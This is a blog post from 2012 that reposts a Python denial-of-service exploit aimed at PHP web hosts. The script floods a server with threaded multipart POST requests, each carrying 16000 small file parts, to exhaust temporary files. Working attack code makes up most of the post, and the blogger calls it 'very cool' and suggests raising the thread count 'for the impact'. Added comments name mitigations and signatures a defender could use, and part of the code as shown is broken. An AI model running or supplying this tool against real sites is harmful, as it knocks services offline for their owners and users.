19 Oct 2012

DOS Exploit for PHP hosts - Python

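While surfing the internet I came across a very cool Python exploit written by Eren Turkay which can cause a denial of service on any host running PHP. It doesn't matter whether the targeted script handles uploads or not: PHP writes every file part of a multipart request to a temporary file before the script runs, so any PHP script the host serves is enough. The script's usage text calls this temporary file exhaustion. Hosts that cap the number of files accepted per request (PHP's `max_file_uploads` setting) and limit request body size at the web server are far less exposed.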
By default this code will create 100 threads, each thread will send 10 requests. You're always free to increase or decrease these numbers for the impact.

Warning: This script is for educational purposes only. Use it at your own risk.

import socket
import random
import time
import threading
import sys
class Connection:
    """Thin wrapper around one blocking IPv4 TCP socket.

    Exploit.run uses it to deliver a single pre-built request string:
    connect(), send(), close().
    """
    def __init__(self, host, port):
        # Only the endpoint is stored here; no socket exists until connect().
        self._host = host
        self._port = port 
      self.sock = None
    def connect(self):
        """Create a TCP socket and connect it to (host, port)."""
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.connect((self._host, self._port))

    def send(self, msg):
        """Pass msg to socket.send() on the connected socket."""
        if not self.sock:
            # NOTE(review): the operand is a plain string, i.e. a legacy
            # string exception rather than an exception class.
            raise "NotConnected"
        else:
            self.sock.send(msg)

    def close(self):
        """Close the underlying socket."""
        self.sock.close()

class Exploit (threading.Thread):
    """Worker thread that sends a multipart/form-data POST with 16000 file parts.

    The usage banner in this file describes the intended effect as PHP
    temporary file exhaustion. On the wire a defender sees a POST whose
    body holds 16000 small ``file_N.txt`` parts and whose header block
    carries the misspelled ``Uset-Agent`` name; both are distinguishing
    details for log review or a filtering rule.

    NOTE(review): capping files per request (PHP ``max_file_uploads``) and
    limiting request body size at the web server are the usual mitigations;
    confirm against the deployed configuration.
    """
    def __init__(self, host, port, target):
        # host/port: TCP endpoint; target: request path placed on the POST line.
        self._host = host
        self._port = port
        self._target = target
        threading.Thread.__init__(self)

    def getBoundary(self):
        """Return a multipart boundary: a run of dashes plus a random integer.

        The integer is drawn from [100000, 100000000) after reseeding the
        random module.
        """
        random.seed()
        rnd = random.randrange(100000, 100000000)
        data = "---------------------------%s" % rnd
        return data

    def createPayload(self):
        """Build the request text: header template, file parts, closing boundary.

        Returns the template with host, target, boundary and length filled
        in by %-formatting; length is taken from len(data).
        """
        data = """POST %(target)s HTTP/1.1\r
Host: %(host)s\r
Uset-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)\r
Connection: keep-alive\r
Content-Type: multipart/form-data; boundary=%(boundary)s\r
Content-Length: %(length)s\r\n\r\n"""

        boundary = self.getBoundary()

        # Append 16000 file parts, each a one-line text/plain "upload"
        # named file_<i> / file_<i>.txt.
        for i in range(16000):
            data += "--%s\r\n" % boundary
            data += """Content-Disposition: form-data; name="file_%s"; filename="file_%s.txt"\r
Content-Type: text/plain\r\n
Lorem ipsum dolor sit amet, consectetur adipiscing elit. In non blandit augue.\n\r\n""" % (i, i)

        # Closing delimiter that ends the multipart body.
        data += "--%s--\r\n" % boundary

        return data % {"host": self._host, "target": self._target, "boundary": boundary, "length": str(len(data))}

    def run(self):
        """Thread entry point: build the payload, then connect, send and close."""
        payload = self.createPayload()
        for i in range(0, 10):
            # A fresh Connection (new TCP socket) is used for each send.
            c = Connection(self._host, self._port)
            c.connect()
            c.send(payload)
            c.close()
            sys.exit(0)
        del payload
        sys.exit(0)

def usage():
    """Print the author banner and the command-line usage text to stdout."""
    banner = """
 __^__                                                  __^__
( ___ )------------------------------------------------( ___ )
 | / |                                                  | \ |
 | / | Eren Turkay <eren .-. pardus.org.tr>, 2009/11/20 | \ |
 | / | http://www.pardus.org.tr/eng/                    | \ |
 |___|                                                  |___|
(_____)------------------------------------------------(_____)

PHP denial of service exploit via temporary file exhaustion
Usage: python php-multipart-dos.py <host> <port> </adress/index.php> <child number: optional>

See source code for more information
"""

    print banner

if __name__ == '__main__':
    # Command line: <host> <port> <path> [thread count]. Fewer than three
    # arguments prints the usage banner and does nothing else.
    if not len(sys.argv) >= 4:
        usage()
    else:
        # is child number passed?
        if len(sys.argv) >= 5:
            child = int(sys.argv[4])
        else:
            # Default number of Exploit threads when argv[4] is absent.
            child = 100
        print "[+] Attack started..."
        for i in range(0, child):
            try:
                # One Exploit thread per iteration: argv[1] is the host,
                # argv[2] the port, argv[3] the request path.
                exp = Exploit(str(sys.argv[1]), int(sys.argv[2]), str(sys.argv[3]))
                exp.start()
                # Trailing comma plus "\r" rewrites the same console line,
                # giving a progress counter.
                print "[+] Opening %s childs... [%s]\r" % (child, i+1),
                sys.stdout.flush()
                # No effect on iteration: the for loop rebinds i on the next pass.
                i += 1
            except KeyboardInterrupt:
                print "\n[-] Keyboard Interrupt. Exiting..."
                sys.exit(1)

        # print it so that previous "Opening childs..." is still there
        print ""
        # Poll the live thread count until only the main thread remains.
        while True:
            try:
                activeChilds = threading.activeCount()
                print "[+] Waiting for childs to finish. %d remaining...\r" % activeChilds,
                sys.stdout.flush()
                # we have one main process
                if activeChilds == 1:
                    print "\nOK!"
                    sys.exit(0)
            except KeyboardInterrupt:
                print "\n[-] Exiting without waiting!"
                sys.exit(1)

Having troubles in compiling the code ? Take a look at How to Compile a Python Program.

Stay tuned for more tricks.

1 comments:

Bulan mengambang said...

how to use this script???
